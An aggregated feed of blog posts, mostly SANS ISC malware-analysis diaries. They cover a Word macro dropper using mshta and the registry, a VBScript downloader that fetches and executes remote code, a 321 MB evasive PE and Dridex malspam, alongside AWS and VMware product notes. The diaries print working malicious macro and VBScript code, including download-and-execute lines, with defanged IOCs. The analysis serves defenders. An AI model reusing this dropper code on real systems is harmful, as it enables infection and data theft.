Covid19 Domain Classifier, (Sat, Mar 28th)

This post was originally published on this site

Johannes started a Covid19 Domain Classifier here on our Internet Storm Center site.

From SANS NewsBites Vol. 22 Num. 025:

Help Us Classify COVID-19 Related Domains

These last couple of weeks, criminals have been using COVID-19 for everything from selling fake cures to phishing. Every day, several thousand domains are registered for COVID-19 related keywords. We are trying to identify the worst, and classify the domains into different risk categories. If you have some time this weekend, please help us out by checking out some of these domains. To participate, see https://isc.sans.edu/covidclassifier.html. The domain data is based on a feed provided by Domaintools and we will make the results of this effort public for download as soon as we have a “critical mass” of responses.

When you log in with your account to the SANS ISC site, you’ll get a list of 10 domains to classify, like this:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malicious JavaScript Dropping Payload in the Registry, (Fri, Mar 27th)

When we speak about “fileless” malware, we mean malware that does not use the standard filesystem to store temporary files or payloads. It still needs to write data somewhere on the system for persistence or during the infection phase, and if the filesystem is not used, the classic place to store data is the registry. Here is an example of malicious JavaScript code that uses a temporary registry key to drop its payload (although it also drops files in the classic way).

The malware was delivered via a Microsoft Word document:

remnux@remnux:/malwarezoo/20200327$ oledump.py information_03.26.doc 
A: word/vbaProject.bin
 A1:       576 'PROJECT'
 A2:       104 'PROJECTwm'
 A3: m    1127 'VBA/ThisDocument'
 A4:      3798 'VBA/_VBA_PROJECT'
 A5:      2201 'VBA/__SRP_0'
 A6:       206 'VBA/__SRP_1'
 A7:       348 'VBA/__SRP_2'
 A8:       106 'VBA/__SRP_3'
 A9: M    2319 'VBA/a4bLF'
A10: M    2026 'VBA/acpqnS'
A11: M    2457 'VBA/ajzdY'
A12:       913 'VBA/dir'
A13: m    1171 'VBA/f'
 A14:        97 'f/\x01CompObj'
 A15:       284 'f/\x03VBFrame'
A16:        86 'f/f'
A17:     37940 'f/o'

Several macros are present and are easy to decode:

Sub AutoOpen()
  main
End Sub

And:

Sub main()
  ' Three obfuscated paths: the '$' separators are removed and the result reversed
  ajKTO = StrReverse(ae5RXS("e$x$e$.$a$t$h$s$m$\$2$3$m$e$t$s$y$s$\$s$w$o$d$n$i$w$\$:$c$", "$", ""))
  akYREj = StrReverse(aQqnur("m$o$c$.$t$f$o$s$o$r$c$i$m$\$a$t$a$d$m$a$r$g$o$r$p$\$:$c$", "$", ""))
  aXlTxC = StrReverse(airmZ6("l$m$t$h$.$x$e$d$n$i$\$a$t$a$d$m$a$r$g$o$r$p$\$:$c$", "$", ""))
  Call VBA.FileCopy(ajKTO, akYREj)   ' copy mshta.exe under a new name in c:\programdata
  Set axe16 = f.i                    ' control 'i' of the hidden form 'f' holds the payload
  atk8Jw aXlTxC, axe16.value         ' write the payload to index.html
  Shell akYREj & " " & aXlTxC        ' run the copied mshta.exe on index.html
End Sub

The three lines containing StrReverse() are easy to deobfuscate: remove the ‘$’ characters and reverse the string:

StrReverse(ae5RXS("e$x$e$.$a$t$h$s$m$\$2$3$m$e$t$s$y$s$\$s$w$o$d$n$i$w$\$:$c$", "$", "")) = "c:\windows\system32\mshta.exe"
StrReverse(aQqnur("m$o$c$.$t$f$o$s$o$r$c$i$m$\$a$t$a$d$m$a$r$g$o$r$p$\$:$c$", "$", "")) = "c:\programdata\microsoft.com"
StrReverse(airmZ6("l$m$t$h$.$x$e$d$n$i$\$a$t$a$d$m$a$r$g$o$r$p$\$:$c$", "$", "")) = "c:\programdata\index.html"

The function atk8Jw() dumps the payload:

Public Function atk8Jw(ar9a1t, afn6Jc)
  Open ar9a1t For Output As #1
  Print #1, afn6Jc
  Close #1
End Function

The file index.html is created based on the content of a hidden form in the Word document (called ‘f’).

The second stage is executed via mshta.exe. This piece of code uses the registry to dump the next stage:

<p id="content">6672613771647572613771646e726137 ...(very long string)... 2613771642972613771643b7261377164</p>
...
var aYASdB = "HKEY_CURRENT_USER\Software\softkey";
...
aB9lM.RegWrite(aYASdB, a0KxU.innerHTML, "REG_SZ");
...
aUayK = aB9lM.RegRead(aYASdB)
...
aB9lM.RegDelete(aYASdB)

The content of the HTML element with id ‘content’ is hex-encoded and obfuscated with garbage characters. Once decoded, we get another batch of obfuscated code.
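Both layers of obfuscation seen in this dropper, the ‘$’-padded reversed strings in the macro and the hex blob with junk characters parked in the registry, can be undone with a few lines of Python. This is an added example, not the diary’s code; the junk token ‘ra7qd’ is inferred from the visible start of the hex string (66 72 61 37 71 64 is ‘f’ followed by ‘ra7qd’), and the round-trip plaintext is constructed.

```python
from collections import Counter

# Junk token inferred from the diary's visible hex prefix (assumption):
# 66 72 61 37 71 64 75 ... -> "f" + "ra7qd" + "u" + "ra7qd" + ...
JUNK = "ra7qd"

def strreverse_deobf(s, sep="$"):
    """Layer 1 (Word macro): undo StrReverse(Replace(s, "$", ""))."""
    return s.replace(sep, "")[::-1]

def hex_to_text(hexstr):
    """Layer 2 (HTA): decode the hex blob kept in <p id="content"> and in the registry."""
    return bytes.fromhex(hexstr).decode("latin-1")

def infer_junk(text, length=len(JUNK)):
    """Most frequent substring of the given length. Junk inserted after every real
    character dominates the n-gram counts, so it can be recovered from the blob."""
    grams = Counter(text[i:i + length] for i in range(len(text) - length + 1))
    return grams.most_common(1)[0][0]

def decode_stage(hexstr, junk=None):
    """Hex-decode, then strip the junk token (inferred when not given)."""
    text = hex_to_text(hexstr)
    return text.replace(junk or infer_junk(text), "")

def encode_stage(plain, junk=JUNK):
    """Inverse of decode_stage, used only to build a constructed round-trip sample."""
    return "".join(c + junk for c in plain).encode("latin-1").hex()

PAGE_PREFIX = "6672613771647572613771646e726137"   # first 16 bytes shown in the diary
CONSTRUCTED = 'var a = "constructed sample";'      # constructed, not from the malware

if __name__ == "__main__":
    print(strreverse_deobf("e$x$e$.$a$t$h$s$m$\\$2$3$m$e$t$s$y$s$\\$s$w$o$d$n$i$w$\\$:$c$"))
    print(hex_to_text(PAGE_PREFIX), "->", decode_stage(PAGE_PREFIX))
    assert decode_stage(encode_stage(CONSTRUCTED)) == CONSTRUCTED
```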

It fetches the next stage from this URL: 

hxxp://his3t35rif0krjkn[.]com/kundru/targen.php?l=swep4.cab

Unfortunately, the file had already been removed and I was not able to continue the analysis…

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New – Low-Cost HDD Storage Option for Amazon FSx for Windows File Server

You can use Amazon FSx for Windows File Server to create file systems that can be accessed from a wide variety of sources and that use your existing Active Directory environment to authenticate users. Last year we added a ton of features including Self-Managed Directories, Native Multi-AZ File Systems, Support for SQL Server, Fine-Grained File Restoration, On-Premises Access, a Remote Management CLI, Data Deduplication, Programmatic File Share Configuration, Enforcement of In-Transit Encryption, and Storage Quotas.

New HDD Option
Today we are adding a new HDD (Hard Disk Drive) storage option to Amazon FSx for Windows File Server. While the existing SSD (Solid State Drive) storage option is designed for the highest-performance, latency-sensitive workloads like databases, media processing, and analytics, HDD storage is designed for a broad spectrum of workloads including home directories, departmental shares, and content management systems.

Single-AZ HDD storage is priced at $0.013 per GB-month and Multi-AZ HDD storage is priced at $0.025 per GB-month (this makes Amazon FSx for Windows File Server the lowest cost file storage for Windows applications and workloads in the cloud). Even better, if you use this option in conjunction with Data Deduplication and use 50% space savings as a reasonable reference point, you can achieve an effective cost of $0.0065 per GB-month for a single-AZ file system and $0.0125 per GB-month for a multi-AZ file system.

You can choose the HDD option when you create a new file system:

If you have existing SSD-based file systems, you can create new HDD-based file systems and then use AWS DataSync or robocopy to move the files. Backups taken from newly created SSD or HDD file systems can be restored to either type of storage, and with any desired level of throughput capacity.

Performance and Caching
The HDD storage option is designed to deliver 12 MB/second of throughput per TiB of storage, with the ability to handle bursts of up to 80 MB/second per TiB of storage. When you create your file system, you also specify the throughput capacity:

The amount of throughput that you provision also controls the size of a fast, in-memory cache for your file share; higher levels of throughput come with larger amounts of cache. As a result, Amazon FSx for Windows File Server file systems can be provisioned so as to be able to provide over 3 GB/s of network throughput and hundreds of thousands of network IOPS, even with HDD storage. This will allow you to create cost-effective file systems that are able to handle many different use cases, including those where a modest subset of a large amount of data is accessed frequently. To learn more, read Amazon FSx for Windows File Server Performance.

Now Available
HDD file systems are available in all regions where Amazon FSx for Windows File Server is available and you can start creating them today.

Jeff;

BuildforCOVID19 Global Online Hackathon

The COVID-19 Global Hackathon is an opportunity for builders to create software solutions that drive social impact with the aim of tackling some of the challenges related to the current coronavirus (COVID-19) pandemic.

We’re encouraging YOU – builders around the world – to #BuildforCOVID19 using technologies of your choice across a range of suggested themes and challenge areas, some of which have been sourced through health partners like the World Health Organization. The hackathon welcomes locally and globally focused solutions and is open to all developers.

AWS is partnering with technology companies like Facebook, Giphy, Microsoft, Pinterest, Slack, TikTok, Twitter, and WeChat to support this hackathon. We will be providing technical mentorship and credits for all participants.

Join BuildforCOVID19 and chat with fellow participants and AWS mentors in the COVID19 Global Hackathon Slack channel.

Jeff;

Very Large Sample as Evasion Technique?, (Thu, Mar 26th)

Security controls have a major requirement: they must not (or at least should try not to) interfere with the normal operations of the protected system. It is well known that antivirus products do not scan very large files (or scan only the first x bytes) for performance reasons. Can a very big file therefore be considered a technique to bypass security controls? Yesterday, while hunting, I spotted a very interesting malware sample. The malicious PE file was delivered via multiple stages, but the final dropped file was large… very large!

It started with a classic phishing email containing a shortened URL:

hxxp://bit[.]ly/2WFm2wY

(Tip: Not many people are aware that if you add a ‘+’ sign at the end of a bit.ly URL, you won’t be redirected automatically to the real URL but a page with the link will be returned instead. This can help you to decide if the shortened URL is malicious or not.)

This URL redirected to a second shortener service:

hxxps://rebrand[.]ly/9zcj74uFAT039

Finally, the real URL was visited:

hxxps://cld[.]pt/dl/download/6812fec0-88b6-4e41-9eb1-e5cb06be83e0/sapotransfer-5a1a0746e3e7ePG/ER-3939874-FT.zip?download=true

The ZIP archive (SHA256:7dc6b78fac829e25232fa5fa885464d25bdef45fa577d10f3e73fe393e1c2c19) contains a VBScript file ‘ER-3939874-FT.vbs’ (SHA256:494b9fc1957434ac5626d5fa17189db09f1acea00c856caf107d7bb22fde5ec5).

A quick analysis reveals that the code is very simple.

It downloads another piece of code from a URL:

Set Dnlakdnsks = CreateObject("Msxml2.XMLHttp.6.0")
Dnlakdnsks.open "GET", Cfgghhhh("_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y"), False
Dnlakdnsks.send

And executes it:

Function DJierorpoop(WWWWWw)
  ExecuteGlobal WWWWWw
End Function
DJierorpoop Dnlakdnsks.responseText

The URL (‘_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y’) is deobfuscated via the following function:

Function Cfgghhhh(G1g)
  For DnnKS = 1 To Len(G1g)
    MDNSLS = Mid(G1g, DnnKS, 1)
    MDNSLS = Chr(Asc(MDNSLS)+ 9)
    SSXSLDKSNS = SSXSLDKSNS + MDNSLS
  Next
  Cfgghhhh = SSXSLDKSNS
End Function

We can simulate it in Python. The string is processed character by character: each character is converted to its ASCII value, shifted by 9 positions and converted back:

>>> s = '_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y'
>>> out = ''
>>> for c in s:
...     out = out + chr(ord(c) + 9)
...
>>> out
'hxxps://pastebin[.]com/raw/GM28hNHb'

This pastie contains more VBScript code and, once executed, it performs the following actions:

It downloads the next stage from the Internet. The URL is encoded using the same technique (see above) but the characters are shifted by 10 instead of 9. The deobfuscated URL is:

hxxp://160[.]20[.]147[.]130:1948/DNsikidstrou9095.iso

The .iso file is a big chunk of Base64 encoded data. Once decoded, we have a ZIP archive:

remnux@remnux:/malwarezoo$ wget hxxp://160[.]20[.]147[.]130:1948/DNsikidstrou9095.iso
remnux@remnux:/malwarezoo$ base64 -d DNsikidstrou9095.iso | file -
/dev/stdin: Zip archive data, at least v2.0 to extract
remnux@remnux:/malwarezoo$ base64 -d DNsikidstrou9095.iso >DNsikidstrou9095.iso.zip
remnux@remnux:/malwarezoo$ unzip DNsikidstrou9095.iso.zip
Archive:  DNsikidstrou9095.iso.zip
  inflating: DNsikidstrou9095.exe

The PE file (SHA256:a5d786ee432dd486d6773621301997c3143dc47a8525c683ff6281990ff9d14d) is very large:

remnux@remnux:/malwarezoo$ ls -lh DNsikidstrou9095.exe
-rw-r--r-- 1 remnux remnux 321M Mar 25 08:20 DNsikidstrou9095.exe

321MB is really big! This simple trick can bypass many security controls.

Often, such files are padded with zeroes to make them bigger but it was not the case this time. Let’s inspect the PE file with PEStudio[1]. The PE file format is quite complex[2] and contains ‘sections’. Sections are ‘areas’ in the file that store different types of data:

.text : contains executable code
.data: contains ‘data’ used by the program

An interesting one is ‘.rsrc’ which contains the ‘resources’. As you can see, this section takes more than 97% of the complete file size:

Resources can be any type of data embedded in the application. Common data are icons, cursors, images, etc.
In our malicious PE, we see three big resources:

PEStudio can dump resources to disk. Let’s dump them and see what we have:

remnux@remnux:/malwarezoo$ file  DNsikidstrou9095.*.bmp
DNsikidstrou9095.exe.0.bmp: PC bitmap, Windows 3.x format, 9161 x 7054 x 24
DNsikidstrou9095.exe.1.bmp: PC bitmap, Windows 3.x format, 4267 x 5293 x 24
DNsikidstrou9095.exe.2.bmp: PC bitmap, Windows 3.x format, 4414 x 4959 x 24
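A triage check for the observation above (a 321 MB PE where .rsrc accounts for over 97% of the file) can be written against the section table directly, without a PE library. Added example, not part of the diary; the PE built by build_pe() is a constructed header-only fixture for exercising the parser, and the size and ratio thresholds are assumptions.

```python
import struct

def section_table(data):
    """Parse the PE section headers with struct only (no pefile dependency).
    Returns [(name, SizeOfRawData, PointerToRawData), ...]."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    table = pe_off + 24 + opt_size                             # first IMAGE_SECTION_HEADER
    out = []
    for i in range(nsections):
        hdr = data[table + 40 * i:table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_off = struct.unpack_from("<II", hdr, 16)
        out.append((name, raw_size, raw_off))
    return out

def resource_ratio(data):
    """Share of the file taken by .rsrc; the diary's sample was above 0.97."""
    rsrc = sum(size for name, size, _ in section_table(data) if name == ".rsrc")
    return rsrc / len(data)

def looks_padded_with_resources(data, min_size=100 * 1024 * 1024, ratio=0.9):
    """Triage rule (thresholds assumed): a large PE whose resources dwarf everything
    else deserves a second look, e.g. a re-scan with the resources stripped."""
    return len(data) >= min_size and resource_ratio(data) >= ratio

def build_pe(sections):
    """Constructed minimal PE for testing the parser; not runnable and not malware.
    sections = [(b".text", raw_size), ...]; the optional header is omitted (size 0)."""
    hdr_end = 0x40 + 24 + 40 * len(sections)
    raw_off = (hdr_end + 0x1FF) & ~0x1FF                       # 512-byte file alignment
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    body = bytearray()
    for name, size in sections:
        hdr += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", size, 0, size, raw_off + len(body), 0, 0, 0, 0, 0x40000040)
        body += bytes(size)
    return bytes(hdr).ljust(raw_off, b"\0") + bytes(body)

if __name__ == "__main__":
    sample = build_pe([(b".text", 256 * 1024), (b".rsrc", 16 * 1024 * 1024)])
    print(f"{resource_ratio(sample):.3f} of the constructed file is .rsrc")
```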

Files look very similar:


The images do not seem to be computer-generated. I tried to find hidden data in the files, but they look ‘clean’.
The next question is: “Are these sections used by the program?”

There are many tools to play with resources, but I like ResourceTuner[3]. The tool is not free, but it is available in demo mode for 30 days, more than enough to use it from time to time. The tool allows you to browse the resources embedded in a PE file, but also to remove them:

The newly generated file now has a size of (only) 8371200 bytes (SHA256:d8d3665affc98cba7942674a51713878b903f8c19034075eb469c3ace3d6aeb6).

Let’s try to execute it again in a sandbox… Great, it worked perfectly!

It’s a variant of Latentbot[4] that communicates with a C2 at 18[.]231[.]122[.]158.

[1] https://www.winitor.com
[2] https://docs.microsoft.com/en-us/windows/win32/debug/pe-format
[3] http://www.heaventools.com/resource-tuner.htm?
[4] https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Configuring Fluentbit on VMware Cloud PKS for…

A great article describing how to send logs from Kubernetes clusters to a centralized system (here Elasticsearch) on AWS. Monitoring is a key part when we are talking K8s, for many reasons that are quite obvious but sometimes forgotten. I will never repeat this enough: monitoring is the key to happy systems, happy administrators and … Read more Configuring Fluentbit on VMware Cloud PKS for…

Join us for the vSphere 7 Launch Event!

Join us for the vSphere 7 Launch Event! vSphere 7 is VMware’s biggest set of innovations since the launch of ESXi. With all the excitement around this new generation of vSphere and the app modernization solutions we felt our loyal vSphere users deserve an event just for themselves! With the help of the hosts from … Read more Join us for the vSphere 7 Launch Event!

NSX-T: vCenter and NSX-T Inventory out of Sync (Hosts in vSphere not showing up in NSX-T)

Summary:
NSX-T loses sync with the vCenter inventory, but the statuses do not show any issue.  Basically, when you add a host to a vCenter cluster, the NSX-T bits should start installing automatically on the new host, assuming you have created a Transport Node Profile and associated it with the cluster.  The problem is that NSX-T does not see the new host, even though its link to the compute manager (vCenter) looks fine.

Looks fine, Y U NO WORK!?

So what’s going on here? 
This appears to affect NSX-T 2.5 and 2.5.1.  Cause is unknown.

Workaround:
Restart the cm-inventory service on each NSX-T mgmt/controller node using API or CLI.

Details:
If you query the status of cm-inventory via API or CLI on all 3 manager/controller nodes, you get a status of running everywhere.  Note that the primary node associated with the VIP (if configured) is not necessarily the one in charge of inventory, so you could restart the cm-inventory service on it until you are blue in the face and get nowhere, because another node is actually responsible for maintaining the sync.

Even so, with this particular problem, they would all look healthy.  You’d have to dig into the logs to find the issue.  Thankfully Nathan Pyle from VMware helped us find the issue and provided us w/ a workaround solution until the bug is addressed in a future version.

API Method:
GET /api/v1/node/services/cm-inventory/status
POST /api/v1/node/services/cm-inventory?action=restart

CLI Method:
get service cm-inventory
restart service cm-inventory 
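Putting the two API calls above into a loop over all three manager nodes is the practical form of this workaround, since the node behind the VIP is not necessarily the one that owns inventory. Added example, not from the post or from VMware; the manager hostnames are placeholders, the ‘runtime_state’ field name is an assumption about the status response, and dry_run defaults to on so nothing is sent until you flip it.

```python
import base64
import json
import ssl
import urllib.request

SERVICE = "cm-inventory"

def plan_restart(nodes):
    """Status check, then restart, on EVERY manager node: the node behind the VIP is
    not necessarily the one that owns the inventory sync, so one node is not enough."""
    plan = []
    for node in nodes:
        base = f"https://{node}/api/v1/node/services/{SERVICE}"
        plan.append(("GET", base + "/status"))
        plan.append(("POST", base + "?action=restart"))
    return plan

def is_running(body):
    """True when the status document reports the service as running.
    The 'runtime_state' field name is an assumption about the response format."""
    return json.loads(body).get("runtime_state") == "running"

def call(method, url, user, password, cafile=None, timeout=30):
    """One authenticated API call; pass the manager's CA as cafile so TLS stays verified."""
    req = urllib.request.Request(url, data=b"" if method == "POST" else None, method=method)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    req.add_header("Accept", "application/json")
    ctx = ssl.create_default_context(cafile=cafile)
    with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
        return resp.read().decode()

def restart_everywhere(nodes, user, password, cafile=None, dry_run=True):
    """Walk the plan; with dry_run only print what would be sent.
    Returns {status_url: running?} for the GET calls that were actually made."""
    states = {}
    for method, url in plan_restart(nodes):
        if dry_run:
            print(f"[dry-run] {method} {url}")
            continue
        body = call(method, url, user, password, cafile)
        if method == "GET":
            states[url] = is_running(body)
    return states

if __name__ == "__main__":
    # Placeholder hostnames, not from the post.
    managers = ["nsx-mgr-01.example", "nsx-mgr-02.example", "nsx-mgr-03.example"]
    restart_everywhere(managers, "admin", "<password>")
```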

Recent Dridex activity, (Wed, Mar 25th)

Introduction

This week, I’ve seen a lot of malicious spam (malspam) pushing Dridex malware.  Today’s diary provides a quick rundown on the types of malspam I’ve seen, and it also covers what an infected Windows host looks like.

The malspam

I’ve seen at least 3 different themes used during the first two days of this week by malspam pushing Dridex.  One was a voicemail-themed email.  Another used a DHL theme.  Finally, I saw a FedEx-themed email pushing Dridex.  See the images below for examples.


Shown above:  Malspam using a voicemail theme to push Dridex.


Shown above:  Malspam using a DHL theme to push Dridex.


Shown above:  Malspam using a FedEx theme to push Dridex.

An infected Windows host

I infected a lab host using a URL from one of the emails shown above.  See images below for details.


Shown above:  Clicking on the link in the FedEx email.


Shown above:  Extracting a VBS file from the downloaded zip archive.


Shown above:  Running the VBS file drops the initial DLL for Dridex.


Shown above:  Dridex persistence mechanism 1 of 3–a scheduled task.


Shown above:  Dridex persistence mechanism 2 of 3–a registry update.


Shown above:  Dridex persistence mechanism 3 of 3–a shortcut in the Windows startup menu.

Indicators

URLs from the three email examples:

  • hxxp://bienvenidosnewyork[.]com/app.php
  • hxxp://photoflip[.]co[.]in/lndex.php
  • hxxp://everestedu[.]org/lndex.php

Zip archive downloaded from link in one of the malspam:

VBS file extracted from the above zip archive:

Initial Dridex DLL seen after running VBS file:

File hashes for Dridex DLLs made persistent during the infection:

Final notes

Of note, zip archives from links in the emails appeared to be different names/sizes/hashes each time I downloaded one, even if it was from the same link.  Also, when a Dridex-infected Windows host is rebooted, the locations, names, and file hashes of the persistent Dridex DLL files are changed.

Dridex remains a feature of our threat landscape, and it will likely continue to be, at least in the foreseeable future.  Windows 10 hosts that are fully patched and up-to-date have a very low risk of getting infected from Dridex, so it pays to follow best security practices.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.